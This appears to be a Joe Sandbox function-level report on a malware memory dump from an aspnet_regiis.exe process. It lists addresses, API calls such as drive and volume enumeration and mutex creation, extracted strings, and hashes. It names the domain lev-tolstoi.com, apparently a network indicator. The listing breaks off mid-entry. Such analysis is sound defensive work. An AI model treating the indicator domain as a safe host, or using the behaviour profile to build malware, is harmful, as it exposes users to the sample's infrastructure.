Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: ProcessVersion
String ID: :9f$!iVg$#m[k$4$5$8M7K$J17O$O=O;$Tebc$Z)_'$lev-tolstoi.com$m]k[$r_
API String ID: 2384128931-274085115
Opcode ID: fe014ef6bbda5ebaf024359d3f782e82e0a1d4785f1d2b1bed6f206d322882e9
Instruction ID: 3df28268271602e2693868b007154afb43df221d606cfe4bbbce09ed062064ae
Opcode Fuzzy Hash: fe014ef6bbda5ebaf024359d3f782e82e0a1d4785f1d2b1bed6f206d322882e9
Instruction Fuzzy Hash: 4412EEB06093418FD314DF15D8907AEBBE1EF82304F18592EE8D46B3A1E7399915CB9B

Function 0042A39F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 0042A3F1
GetSystemMetrics.USER32 ref: 0042A400
DeleteObject.GDI32 ref: 0042A44D
SelectObject.GDI32 ref: 0042A490
SelectObject.GDI32 ref: 0042A4EA
DeleteObject.GDI32 ref: 0042A51B

Strings

, xrefs: 0042A4C1

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 1449868515-3916222277
Opcode ID: 782ec37c2959ebf7219d55dcd697bacab111a354c5e84ff78982d263564235c1
Instruction ID: 755983a96c950bb84d05556132b73eae1f5c21d6c1609a55007af39724c8ed97
Opcode Fuzzy Hash: 782ec37c2959ebf7219d55dcd697bacab111a354c5e84ff78982d263564235c1
Instruction Fuzzy Hash: 9F517EB0A147008FD754EF3DD98561ABBF0BB89304F41992DE89AC7761E774E848CB46

Function 00432FE0 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 280
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNEL32 ref: 00433304
GetLogicalDrives.KERNELBASE ref: 0043330F
RtlReAllocateHeap.NTDLL(00000000,00000000,00000001,00433212), ref: 004333E9

Strings

Y.[, xrefs: 00432FFB
QS, xrefs: 00433046
d)z', xrefs: 00433246

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: DrivesLogical$AllocateHeap
String ID: d)z'$QS$Y.[
API String ID: 1807012297-2110187971
Opcode ID: a21c3b3f4129e15553885237df2213b0de1d0c04081bc220a0e5d232e9afbb2b
Instruction ID: a8c283327fb45fc391599db1a69f02f2c0a784cc0b9ec3ef168b260d4b5d457c
Opcode Fuzzy Hash: a21c3b3f4129e15553885237df2213b0de1d0c04081bc220a0e5d232e9afbb2b
Instruction Fuzzy Hash: DAA1DB75519300CBD304EF26E841A5FBBE2EB89304F109A3DE4C9973A2D7399915CF9A

Function 0041538C Relevance: 9.9, Strings: 7, Instructions: 1130COMMON

Download Yara Rule

Strings

fA, xrefs: 004166DD
T], xrefs: 00416302
y=qy, xrefs: 0041615E
AV, xrefs: 004162F2
SE, xrefs: 004162EA
oykk, xrefs: 0041613E
(+-5, xrefs: 004153E6

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: (+-5$AV$SE$T]$oykk$y=qy$fA
API String ID: 0-519748777
Opcode ID: c9d11731da2e678f01195484704827eb20ee9124c1b941aa6c9af1edbd9e7861
Instruction ID: dc00e2a7a5827f0aec3bf4046c35abf41c853e01f1f57966a56dcfd989a70e2e
Opcode Fuzzy Hash: c9d11731da2e678f01195484704827eb20ee9124c1b941aa6c9af1edbd9e7861
Instruction Fuzzy Hash: 2E8275B15083418BD324CF14D8916ABBBE2FFC6344F14892EE8D94B391E778D945CB9A

Function 004157D0 Relevance: 9.6, Strings: 7, Instructions: 819
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fA, xrefs: 004166DD
T], xrefs: 00416302
y=qy, xrefs: 0041615E
AV, xrefs: 004162F2
SE, xrefs: 004162EA
[A, xrefs: 00415BCE
oykk, xrefs: 0041613E

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: AV$SE$T]$oykk$y=qy$[A$fA
API String ID: 0-4172716543
Opcode ID: be38f0a5e77af9e1a5e90945fff06f46024cdcfcf441811dcb41cc2621d21abf
Instruction ID: cb5a27a3645892fc926138ee212282b148d83224d4ac8c9e67cde114efd09afd
Opcode Fuzzy Hash: be38f0a5e77af9e1a5e90945fff06f46024cdcfcf441811dcb41cc2621d21abf
Instruction Fuzzy Hash: 9E4294B15083408BD324CF14C5917ABBBE2FFC6358F15891EE8D94B391D7788949CB8A

Function 0040A0A0 Relevance: 9.2, Strings: 7, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 0040A0FD
de, xrefs: 0040A643
MJV#, xrefs: 0040A3C8
r, xrefs: 0040A326
y{, xrefs: 0040A4D8
=?, xrefs: 0040A559
, xrefs: 0040A414

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: $0$MJV#$de$r$=?$y{
API String ID: 0-1020437172
Opcode ID: 58f934d51d4fdb6a4d2afd5cad5ff2d32bd1957ad2e925c54d4f52bb63af5282
Instruction ID: 2553938272f813e02b7dde3977aaa5cfa43c974a3157249c6ae3a8d6dcf5c4f5
Opcode Fuzzy Hash: 58f934d51d4fdb6a4d2afd5cad5ff2d32bd1957ad2e925c54d4f52bb63af5282
Instruction Fuzzy Hash: 9B0210B0208380ABD314CF25C590B6BBBE2ABC5744F548A2DF4D98B392D778D805DB4B

Function 0042EA20 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 473COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(B347AD5A,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0042EB67

Strings

2B, xrefs: 0042EB1E
RB, xrefs: 0042EF27, 0042EF40

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: InformationVolume
String ID: 2B$RB
API String ID: 2039140958-2208005670
Opcode ID: 62147a63e097d6bb038f264d4093d410b7b6430bc493eaad2db901404af3ee23
Instruction ID: d1ab291a97e992e22756c0650c134a5f9b0ffe5d9c37626236ed16de0dfbd978
Opcode Fuzzy Hash: 62147a63e097d6bb038f264d4093d410b7b6430bc493eaad2db901404af3ee23
Instruction Fuzzy Hash: 48D1D3316083119FD314CF19E89172FB7E2FB89314F558A2DF99657290C7789904CB9A

Function 0040CFA0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 331COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(8375854B,00000104), ref: 0040D468

Strings

pedc, xrefs: 0040D2D6
lev-tolstoi.com, xrefs: 0040D437

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: DirectorySystem
String ID: lev-tolstoi.com$pedc
API String ID: 2188284642-822483082
Opcode ID: aa826d0f279e804bf47255f7a83c24bcb0d6657c2ead7bc93b160747b092dee2
Instruction ID: c42a86530aaedcccb0a593ce7615208ae0afe3e94c0c10be7e3d7ba17a93e8cc
Opcode Fuzzy Hash: aa826d0f279e804bf47255f7a83c24bcb0d6657c2ead7bc93b160747b092dee2
Instruction Fuzzy Hash: E5C1ACB15493D28BE3708F24C484B9BBBE1EFD2304F154A6DE8E85B391C73949498B97

Function 0041F7D0 Relevance: 5.4, Strings: 4, Instructions: 449COMMON

Download Yara Rule

Strings

r, xrefs: 0041F99A
57, xrefs: 0041F808
)+, xrefs: 0041F800
=?, xrefs: 0041F818

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: r$)+$57$=?
API String ID: 0-253682767
Opcode ID: 6dd39737549b99e3890198121a449eca8da541e8d158095ee5e390efb8a57515
Instruction ID: da1dd33ba0f03b92d1e1d8b895c4313dbe3d5cac15efdac7fe32d0d3583f2246
Opcode Fuzzy Hash: 6dd39737549b99e3890198121a449eca8da541e8d158095ee5e390efb8a57515
Instruction Fuzzy Hash: D2E19A76618380CFD3248F14D8917ABBBF1EFC6344F40592DE5CA9B291D7B89845CB8A

Function 0043354F Relevance: 5.4, Strings: 4, Instructions: 426COMMON

Download Yara Rule

Strings

":C, xrefs: 00433A0C
gY<S, xrefs: 004339E0
@, xrefs: 00433669
j}, xrefs: 0043356F

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: ":C$@$gY<S$j}
API String ID: 0-499844015
Opcode ID: af6570c47c9b3880a8d757df13c0fe478a9a137867016910190fe9325aa16350
Instruction ID: a6b2f1696e24f5b0969ea865adff2c46d8e5e654b6fbf4898ab95583f0a01a42
Opcode Fuzzy Hash: af6570c47c9b3880a8d757df13c0fe478a9a137867016910190fe9325aa16350
Instruction Fuzzy Hash: 1EE15474608301AFD314CF15C590B2BBBE2ABCA759F14A92DE48987390D778DD06DB8A

Function 00404E60 Relevance: 4.2, Strings: 3, Instructions: 403COMMON

Download Yara Rule

Strings

), xrefs: 00404F04
), xrefs: 00404EFA
IEND, xrefs: 004052F0

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: b6237465425eaa85b41594be0fa2d71e7190e7bcec4c4283aa9127c9c9496032
Instruction ID: e248686785af1d63fe639355df3a55e2ef5919efc3b21b5ed07e0b66ef1c5577
Opcode Fuzzy Hash: b6237465425eaa85b41594be0fa2d71e7190e7bcec4c4283aa9127c9c9496032
Instruction Fuzzy Hash: 97E1AFB1A087019FD310DF29C84171BBBE0BB94314F144A3EE994AB3C1D779E915CB8A

Function 0040F27F Relevance: 3.2, Strings: 2, Instructions: 693COMMON

Download Yara Rule

Strings

r, xrefs: 00410523
0, xrefs: 00410729

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 0$r
API String ID: 0-2496253236
Opcode ID: da6a22461841a95a82ffe3a19e5caa992804dbff797c3f45e9d73f7a6cbc950f
Instruction ID: 603367283566479ed8ccb75802ce0714d44a23040706ee789639a5586186cdd6
Opcode Fuzzy Hash: da6a22461841a95a82ffe3a19e5caa992804dbff797c3f45e9d73f7a6cbc950f
Instruction Fuzzy Hash: C432DF715083808FD325DF24C4907ABBBF1EF96304F04896EE5C997292D7799885CB9B

Function 0040F403 Relevance: 3.0, Strings: 2, Instructions: 537COMMON

Download Yara Rule

Strings

-', xrefs: 00410035
2, xrefs: 00410134

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: -'$2
API String ID: 0-1998670012
Opcode ID: 9c1fc6cc03533ea69ce05d3ac9821036f9f35d17739f71097699bd7021148825
Instruction ID: 781d8270466ba6e68da91edbd15d02616b4ebf166ffe0c0ef1e1133d189ff415
Opcode Fuzzy Hash: 9c1fc6cc03533ea69ce05d3ac9821036f9f35d17739f71097699bd7021148825
Instruction Fuzzy Hash: B202BD719082408BD725EF28D88071FBBE1FF96308F04493DE585A7391EB399949CB9A

Function 004140A0 Relevance: 3.0, Strings: 2, Instructions: 478COMMON

Download Yara Rule

Strings

/.)(, xrefs: 004143F6
AA, xrefs: 004141D1

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: /.)($AA
API String ID: 0-1527991423
Opcode ID: 9c1045a2656030a4945d8d47df94106f17efee5ff85136e2157468294873dc7e
Instruction ID: 5d2d0c719645c5501e68dfb5138feb6adb5c67064f7e7de7a564a69b2d4c628e
Opcode Fuzzy Hash: 9c1045a2656030a4945d8d47df94106f17efee5ff85136e2157468294873dc7e
Instruction Fuzzy Hash: 77C112B56042118BD724DF18DC917BBB3E1FFD5314F08562EE9868B391E7389990C78A

Function 00416720 Relevance: 2.9, Strings: 2, Instructions: 425COMMON

Download Yara Rule

Strings

ig, xrefs: 0041692E
$%, xrefs: 0041679E

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: $%$ig
API String ID: 0-1471383516
Opcode ID: f8a91ff8b0fa27f7d43ca47714211126ff68ff85ca3e8d8384a8484bbf2cd18a
Instruction ID: cabe2240e1eac321f13664e075a325129ada21a301aa0fb3202e32c33cf6677b
Opcode Fuzzy Hash: f8a91ff8b0fa27f7d43ca47714211126ff68ff85ca3e8d8384a8484bbf2cd18a
Instruction Fuzzy Hash: 05C19C715083118BC714DF18C8A17ABB7F1FF86394F058A1DE8965B390E7B8E944CB9A

Function 00436120 Relevance: 2.8, Strings: 2, Instructions: 305COMMON

Download Yara Rule

Strings

ONIH, xrefs: 0043626E
ONIH, xrefs: 00436168

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID: ONIH$ONIH
API String ID: 2994545307-1025764487
Opcode ID: a21bc5579434c508fa49aa0dc3e083849947e0343cf962c933246f847483d8e0
Instruction ID: 6760f1ed0ae1d329c4b663ab63501930252020e06147d9e554caa7ccdeb9e281
Opcode Fuzzy Hash: a21bc5579434c508fa49aa0dc3e083849947e0343cf962c933246f847483d8e0
Instruction Fuzzy Hash: 4491B031A08312ABD710CF19C880A5BB7E2FF89754F15D92DF8889B361D738DD558B8A

Function 00414B89 Relevance: 1.8, APIs: 1, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e8f4aefef329fc62512f11f361ec012ddadb9d6937bec9483e218d40e6b2f47
Instruction ID: 8af835d313e2c9841ed32225ee666157595f5a07326701f743ca198a8088bda5
Opcode Fuzzy Hash: 9e8f4aefef329fc62512f11f361ec012ddadb9d6937bec9483e218d40e6b2f47
Instruction Fuzzy Hash: 7FA1AEB15083518FC728CF18C4516ABB7E1EFC9304F154A6EE9A58B3A2D779E841CB86

Function 00433420 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00435B02,005C003F,00000002,00000018,?), ref: 0043344E

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00414570 Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

/.)(, xrefs: 00414818

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: /.)(
API String ID: 0-2587180175
Opcode ID: be353cfc7e6071974f0cc9e01a84c59092a96f9cbbd0c4b219b7bd4caacb1746
Instruction ID: b5dbb834104e65541a845c2784164149e464bb52038cd636ecc33fb355af6764
Opcode Fuzzy Hash: be353cfc7e6071974f0cc9e01a84c59092a96f9cbbd0c4b219b7bd4caacb1746
Instruction Fuzzy Hash: 4A81F0755083508BD334CF14D851BABB3E6FFC6314F004A2EE999AB391DB789944CB9A

Function 0041D6A1 Relevance: .5, Instructions: 528COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab2c55bc4404ab8ce3902f7bc404aea43873b09e886b96d9e120b1a5bb2e258
Instruction ID: 402cdcd4ece5080350428a361fa4c3611106bf6e40d7dfc67145bd516114109a
Opcode Fuzzy Hash: bab2c55bc4404ab8ce3902f7bc404aea43873b09e886b96d9e120b1a5bb2e258
Instruction Fuzzy Hash: AC029FB19083528FC324DF18C4906ABB7F1FF95754F14892EE4C997360E7789985CB86

Function 00420D50 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 353b3bc74084b0ad410563bba82899c40e59e4c87989eec0f911ef09384e3fb9
Instruction ID: 57bfe7de44fd4f0d957004b99b247f14d9512e7ace01bf03f7595e03a5f0512f
Opcode Fuzzy Hash: 353b3bc74084b0ad410563bba82899c40e59e4c87989eec0f911ef09384e3fb9
Instruction Fuzzy Hash: 490234B1600B018BE328CF29D8917A7B7E1FB49314F404A2DD8EB9BB91D774B545CB98

Function 0041F090 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 571514df7261df35181ce4100fa65b6cdafc8cfe888ce2de327cfc14cb12f88c
Instruction ID: 7aa4a68fb1a406591e873f0a7b4481dd7c296bcf25ae582fb60e216677dbcf76
Opcode Fuzzy Hash: 571514df7261df35181ce4100fa65b6cdafc8cfe888ce2de327cfc14cb12f88c
Instruction Fuzzy Hash: F4D123715083419FC700CF29D4906ABBBE2AF86304F18897EF8D997392D738D94ACB56

Function 004211B0 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cdcd46b47a7acccd5ce5fda590817870b14aa15f5fc9a49a9351c7c776761c2
Instruction ID: c2deaf1f563ad6545443d3b74acdecb165153a16474d3365eef8859d6fa0cbdd
Opcode Fuzzy Hash: 8cdcd46b47a7acccd5ce5fda590817870b14aa15f5fc9a49a9351c7c776761c2
Instruction Fuzzy Hash: 3D518870600B01CBE720CF25D8917A7B3F1FF4A344F00496DE49B9BAA1E774A545CB98

Function 00416D10 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df3fc48b5d634b163faf951f84c7f019b44d804db62c0a723af3165d37282de
Instruction ID: 090d55a522e5177afdf66720a6ecdd842a0bbc621113678ea8f440565db5b1f7
Opcode Fuzzy Hash: 9df3fc48b5d634b163faf951f84c7f019b44d804db62c0a723af3165d37282de
Instruction Fuzzy Hash: 2E417B75518344ABD300DF28DC41BABB7E8EF89754F004A2DF998D3281D738DA45CBAA

Function 00427C9B Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 914d1c6d9fef2c15bb3dee97aed70c4891043c7da93b47b7199dd0d595c054bf
Instruction ID: 7eeb821f6f26ed2fb21c31df3371f28833529de801bcf169f62832fc727c815b
Opcode Fuzzy Hash: 914d1c6d9fef2c15bb3dee97aed70c4891043c7da93b47b7199dd0d595c054bf
Instruction Fuzzy Hash: 7751F8B1A14B409FD360DF3DC946796BAE4AB09220F144B5DF8B9CB3D0E334A9118BD6

Function 00409450 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE ref: 00409582
ExitProcess.KERNEL32 ref: 00409684

Strings

system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 0040962A

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: CreateExitMutexProcess
String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
API String ID: 3437166654-780655312
Opcode ID: 299175d5a21dc3d4e509039720b6acf80a1e39d2dd4d1ea4b4756c0bba8fc5bd
Instruction ID: 13efb928bf53d29c910cda108476fd38d124234316b912b192e036211ebbd97f
Opcode Fuzzy Hash: 299175d5a21dc3d4e509039720b6acf80a1e39d2dd4d1ea4b4756c0bba8fc5bd
Instruction Fuzzy Hash: F8613E70008B82DAD3219F3CC84871ABFA06B62324F148B6DE4E55B6D2D379A955C7DB

Function 00426DEA Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 82
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00426EBF

Strings

Q, xrefs: 00426DF4
[, xrefs: 00426E1C
], xrefs: 00426E04
S, xrefs: 00426DFC
Y, xrefs: 00426E14
_, xrefs: 00426E0C

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: AllocString
String ID: Q$S$Y$[$]$_
API String ID: 2525500382-2253995114
Opcode ID: eb31286e2d1dc163bbe2f61ea6679ab6c77704470cbdc80e10a341dbf722ce6d
Instruction ID: ae6c1d55f4fbaac91964c2ff081fd6d3881d0ce100ae23d53f9fc50850ab4047
Opcode Fuzzy Hash: eb31286e2d1dc163bbe2f61ea6679ab6c77704470cbdc80e10a341dbf722ce6d
Instruction Fuzzy Hash: 0B412870108B81CFD725CF38C494746BFE1AB56314F188A9DD8EA8F396C7B59505CBA2

Function 00428055 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 177memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004280ED

Strings

0, xrefs: 004282BA

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 6eb5b39d5e68e32b6f50ba3d7bc30861a25c39970a78de5f9efc7a1a9ed378eb
Instruction ID: b25a69b070ac93bc8331e55e898bdda6be772d86962f9bed59cca751c92aa313
Opcode Fuzzy Hash: 6eb5b39d5e68e32b6f50ba3d7bc30861a25c39970a78de5f9efc7a1a9ed378eb
Instruction Fuzzy Hash: EAA1E660108BC2CED726CF3C8488602BF916B66224F0987DDD9E94F3EBC769D546C766

Function 00431C50 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00431CD9

Strings

|MJK, xrefs: 00431C96

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID: |MJK
API String ID: 1279760036-2474107196
Opcode ID: e0c071d31afe22bc61692940e342b2b6046174c7cc859ce7716a8745185c3cd4
Instruction ID: 1f5176670e450a89f4d9f2f55dac48342306c35d18e8cafb4f4596adf7f0ef98
Opcode Fuzzy Hash: e0c071d31afe22bc61692940e342b2b6046174c7cc859ce7716a8745185c3cd4
Instruction Fuzzy Hash: 98015E746083409BD305EF18D850B1AFBE5EB85714F10895CE8C8873A1D7799C51CB86

Function 00433304 Relevance: 3.0, APIs: 2, Instructions: 5COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00433304
GetLogicalDrives.KERNELBASE ref: 0043330F

Strings

Y.[, xrefs: 00432FFB
QS, xrefs: 00433046
d)z', xrefs: 00433246

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: DrivesLogical
String ID: d)z'$QS$Y.[
API String ID: 999431828-2110187971
Opcode ID: 64d1ddfafbeb7dbdfcc1548b6b72c393f2904483376007562b5627046e68e9e2
Instruction ID: e8e89344f43158168d04a207317a34bf2a7d647b3148a4884292e8bdcfdaf679
Opcode Fuzzy Hash: 64d1ddfafbeb7dbdfcc1548b6b72c393f2904483376007562b5627046e68e9e2
Instruction Fuzzy Hash: 57B00270565110CBD7047B62FD0A1883670BE41306B61A5BAB462414B58A7508028A1D

Function 004285FB Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00428604

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 46c9c2a6df09579181b67bc1c232c35714d83a6e77756d87258da728de65401f
Instruction ID: e05fb8287dab851cfe41e4891bc83798da47b2845a4ada711733d3c5d86edf7d
Opcode Fuzzy Hash: 46c9c2a6df09579181b67bc1c232c35714d83a6e77756d87258da728de65401f
Instruction Fuzzy Hash: 96414630109B81CFD725CF69C4D4B56BBE1AF5A314F188A9CD8EA4F396C774A405CB62

Function 00433340 Relevance: 1.6, APIs: 1, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

